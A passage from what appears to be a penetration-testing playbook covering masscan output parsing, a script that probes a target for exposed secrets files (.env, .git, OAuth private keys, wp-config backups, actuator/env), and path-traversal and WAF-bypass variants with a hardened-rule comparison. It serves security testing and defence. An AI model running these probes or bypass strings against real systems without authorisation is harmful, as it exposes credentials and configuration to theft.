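&lt;p&gt;As an added example that is not from the playbook, serving both the output-parsing one-liners in 4.2 and the port table above: a Python parser for masscan&amp;rsquo;s &lt;code&gt;-oJ&lt;/code&gt; and &lt;code&gt;-oL&lt;/code&gt; formats (it returns every open port of a host, not only &lt;code&gt;ports[0]&lt;/code&gt; as the jq one-liner does) followed by an exposure check that maps each open port to the table&amp;rsquo;s service and flags the ones a baseline marks internal-only, which is how a defender turns a scan of their own ranges into a list of things to firewall. The masscan output, the 203.0.113.0/24 addresses and the policy column are constructed; the service names are the table&amp;rsquo;s.&lt;/p&gt;

```python
import json

# Port/service pairs from the table above, plus a constructed policy column:
# "allowed" may face the Internet, "review" needs a justification,
# "internal-only" should never answer from a public address.
PORT_TABLE = {
    21: ("FTP", "review"),
    22: ("SSH", "review"),
    80: ("HTTP", "allowed"),
    443: ("HTTPS", "allowed"),
    3000: ("Coolify/Grafana", "internal-only"),
    3306: ("MySQL", "internal-only"),
    5000: ("Flask/Werkzeug", "internal-only"),
    5432: ("PostgreSQL", "internal-only"),
    6379: ("Redis", "internal-only"),
    8080: ("HTTP alt", "review"),
    8443: ("HTTPS alt", "review"),
    9000: ("MinIO/S3", "internal-only"),
    9001: ("MinIO/S3", "internal-only"),
    9090: ("Prometheus", "internal-only"),
    9200: ("Elasticsearch", "internal-only"),
    27017: ("MongoDB", "internal-only"),
}


def parse_masscan_json(text):
    """masscan -oJ: a JSON array of {ip, timestamp, ports: [{port, proto, status, ...}]}.
    Returns a set of (ip, port, proto) for every open port, not only ports[0]."""
    pairs = set()
    for entry in json.loads(text):
        ip = entry.get("ip")
        if ip is None:          # tolerate trailer entries that carry no host
            continue
        for p in entry.get("ports", []):
            if p.get("status", "open") == "open":
                pairs.add((ip, int(p["port"]), p.get("proto", "tcp")))
    return pairs


def parse_masscan_list(text):
    """masscan -oL: 'open tcp PORT IP TIMESTAMP' per line, '#' lines are comments.
    Field positions match the awk one-liner ($3 = port, $4 = ip)."""
    pairs = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "open":
            continue
        _state, proto, port, ip, _ts = fields
        pairs.add((ip, int(port), proto))
    return pairs


def classify_exposure(pairs):
    """Attach the table's service and policy to each (ip, port, proto)."""
    findings = []
    for ip, port, proto in sorted(pairs):
        service, policy = PORT_TABLE.get(port, ("unknown", "review"))
        findings.append({"host": ip, "port": port, "proto": proto,
                         "service": service, "policy": policy})
    return findings


def violations(findings):
    """Services that must not be reachable from the scanned (public) side."""
    return [f for f in findings if f["policy"] == "internal-only"]


# Constructed masscan outputs for a scan of an organisation's own /24.
SAMPLE_JSON = """[
{ "ip": "203.0.113.10", "timestamp": "1700000000", "ports": [ {"port": 443, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 54} ] },
{ "ip": "203.0.113.10", "timestamp": "1700000001", "ports": [ {"port": 6379, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 54} ] },
{ "ip": "203.0.113.25", "timestamp": "1700000002", "ports": [ {"port": 27017, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 54} ] }
]"""

SAMPLE_LIST = """#masscan
open tcp 443 203.0.113.10 1700000000
open tcp 6379 203.0.113.10 1700000001
open tcp 27017 203.0.113.25 1700000002
# end
"""

if __name__ == "__main__":
    for f in violations(classify_exposure(parse_masscan_json(SAMPLE_JSON))):
        print(f["host"], f["port"], f["service"], "is reachable but internal-only")
```

&lt;p&gt;Feed it the real &lt;code&gt;full.json&lt;/code&gt; or &lt;code&gt;scan.txt&lt;/code&gt; from the commands above; the two parsers return the same set for the same scan, so either output format works, and the &lt;code&gt;review&lt;/code&gt; rows (SSH, FTP, the 8080/8443 alternates) are the ones worth a second look in the table&amp;rsquo;s &amp;ldquo;what to look for&amp;rdquo; column.&lt;/p&gt;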
&lt;hr&gt;
&lt;h2 id="5-web-enumeration" &gt;
&lt;div&gt;
&lt;a href="#5-web-enumeration"&gt;
#
&lt;/a&gt;
5. WEB ENUMERATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="51-sensitive-files--always-test" &gt;
&lt;div&gt;
&lt;a href="#51-sensitive-files--always-test"&gt;
##
&lt;/a&gt;
5.1 Sensitive Files — ALWAYS TEST
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;This is the first thing to do on any target. Success rate is high on neglected infrastructure.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Environment &amp;amp; Config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.example&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.production&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.local&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.backup&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.bak&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.old&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.staging&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/config/.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/config&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/HEAD&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/index&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/refs/heads/master&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/logs/HEAD&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Laravel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-private.key&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-public.key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/logs/laravel.log&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/logs/laravel-*.log&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/framework/views/*&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Docker / Deploy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Dockerfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/docker-compose.yml&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/docker-compose.override.yml&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Procfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.dockerignore&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Package Managers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/composer.json&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/composer.lock&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/package.json&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/package-lock.json&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/yarn.lock&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Gemfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Gemfile.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/requirements.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Pipfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Pipfile.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Cargo.toml&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/go.mod&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Frameworks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/artisan&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/server.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/web.config&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php.bak&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php~&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-content/debug.log&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/readme.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Source Maps (reconstruct source code!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/assets/index-*.js.map&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/build/*.js.map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/static/js/*.js.map&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/js/*.js.map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Debug / Info&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/phpinfo.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/info.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/test.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/debug&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/health&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/beans&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/mappings&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/swagger-ui.html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/swagger-ui/index.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/v2/api-docs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/v3/api-docs&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/graphql&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/graphiql&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/playground&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Panels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/login&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/dashboard&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/panel&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/manager/html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/host-manager/html&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Tomcat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Misc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/robots.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/sitemap.xml&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.htaccess&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/nginx.conf&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.well-known/security.txt&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/server-status&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/server-info&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/phpmyadmin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/_phpmyadmin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/pma&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# A catch-all vhost answers 200 to every path: treat a 200 here as a lead, not a finding, until the body is verified&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; f &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; files:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;base&lt;span style="color:#a6d189"&gt;}{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;, allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;&lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;b): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;150&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; (&lt;span style="color:#ef9f76"&gt;301&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;302&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;303&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;307&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;308&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; redirect &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; to &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; (&lt;span style="color:#ef9f76"&gt;401&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔒 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (exists, blocked)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;RequestException:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;  &lt;span style="color:#737994;font-style:italic"&gt;# timeout, DNS failure or refused connection: skip this path&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="52-path-traversal--bypass" &gt;
&lt;div&gt;
&lt;a href="#52-path-traversal--bypass"&gt;
##
&lt;/a&gt;
5.2 Path Traversal &amp;amp; Bypass
&lt;/div&gt;
&lt;/h3&gt;
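&lt;p&gt;An added example, not part of the original playbook: why the variants listed in this section work, shown as code. A weak rule matches the raw request target, the way a WAF signature or a proxy deny rule written against the un-normalised path does. The backend percent-decodes, truncates at a NUL byte or a '#', and collapses dot segments before opening the file, so a variant the rule never recognises still resolves to /.env. The hardened rule applies the same normalisation first and denies any dotfile segment, and the detection helper flags the tell-tale encodings in the raw target for logging. The decode-twice-then-truncate backend model and both rule shapes are this example's assumptions, not a description of any particular server.&lt;/p&gt;

```python
import posixpath
import re
from urllib.parse import unquote

# The weak rule: a signature applied to the raw request target before any
# decoding or normalisation. Assumed shape for this example.
NAIVE_RULE = re.compile(r"/\.env$")

# The variants from this section plus one double-encoded one added here.
PAGE_VARIANTS = [
    "/../.env", "/%2e%2e/.env", "/..%2f.env",
    "/public/../.env", "/storage/../.env",
    "/.%00.env", "/.env%00.html", "/.env%23",
    "/..%252f.env",
]


def naive_block(raw_path):
    """True when the raw target matches the literal deny signature."""
    return NAIVE_RULE.search(raw_path) is not None


def backend_resolve(raw_path):
    """Model of what a lax backend opens: percent-decode twice (double encoding),
    truncate at NUL or '#', then collapse dot segments under the document root.
    This is the example's assumption about the backend, not universal behaviour."""
    p = unquote(unquote(raw_path))
    for stop in ("\x00", "#"):
        idx = p.find(stop)
        if idx != -1:
            p = p[:idx]
    return posixpath.normpath("/" + p.lstrip("/"))


def looks_like_traversal(raw_path):
    """Detection signal for logs: encoded dots/slashes, NUL, nested encoding or '..'."""
    return re.search(r"%2e|%2f|%5c|%00|%25|\.\.", raw_path, re.I) is not None


def hardened_block(raw_path):
    """The fixed rule: deny on the normalised path (any dotfile segment) and also
    refuse a target that still carries traversal encodings."""
    resolved = backend_resolve(raw_path)
    if any(seg.startswith(".") for seg in resolved.split("/") if seg):
        return True
    return looks_like_traversal(raw_path)


def evaluate(variants):
    """For each raw variant: where it resolves and whether each rule lets it through."""
    out = {}
    for v in variants:
        resolved = backend_resolve(v)
        reaches_env = resolved == "/.env"
        out[v] = {
            "resolves_to": resolved,
            "naive_bypassed": reaches_env and not naive_block(v),
            "hardened_bypassed": reaches_env and not hardened_block(v),
        }
    return out


if __name__ == "__main__":
    for raw, info in evaluate(PAGE_VARIANTS).items():
        print(raw, info)
```

&lt;p&gt;Variants whose raw form already ends in /.env (the prefix-directory ones) are caught even by the literal rule; the ones that get through are those where the decisive transformation happens after the rule ran: decoding, NUL truncation, fragment truncation, and double decoding. Which of those a real backend performs varies, so run the list rather than assuming.&lt;/p&gt;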
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Bypass variations for blocking rules&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.env&amp;#34;&lt;/span&gt;,
